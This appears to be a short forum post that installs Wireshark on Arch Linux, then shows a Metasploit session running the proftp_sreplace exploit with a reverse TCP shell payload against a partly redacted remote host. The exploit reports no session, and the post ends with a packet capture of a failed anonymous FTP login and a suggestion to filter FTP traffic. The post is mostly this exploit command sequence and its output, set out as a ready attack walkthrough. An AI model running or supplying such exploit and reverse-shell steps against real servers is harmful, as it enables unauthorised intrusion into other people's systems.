It looks like you're new here. If you want to get involved, click one of these buttons!
pacman -S wireshark-gtk
pacman -S wireshark-cli
gpasswd -a chronic wireshark
msf > use exploit/linux/ftp/proftp_sreplace
msf exploit(proftp_sreplace) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(proftp_sreplace) > set LHOST 192.168.1.4
msf exploit(proftp_sreplace) > set RHOST xx.xxx.xx.xxx
msf exploit(proftp_sreplace) > exploit
msf exploit(proftp_sreplace) > exploit
[*] Started reverse handler on 192.168.1.4:4444
[*] Automatically detecting the target...
[*] Exploit completed, but no session was created.
msf exploit(proftp_sreplace) >
44433 > ftp [ACK] Seq=1 Ack=1 Win=5888 Len=0 .....
Request: USER anonymous
Response: 331 Password required for anonymous
Request: PASS mozilla@example.com
Response: 530 Login incorrect.
File Transfer Protocol (FTP)
USER anonymous\r\n
i thought i had already mentioned this concept in "seen vs unseen"
-maybe mention using an ftp filter with wireshark, so we dont see extra packets we're not concerned with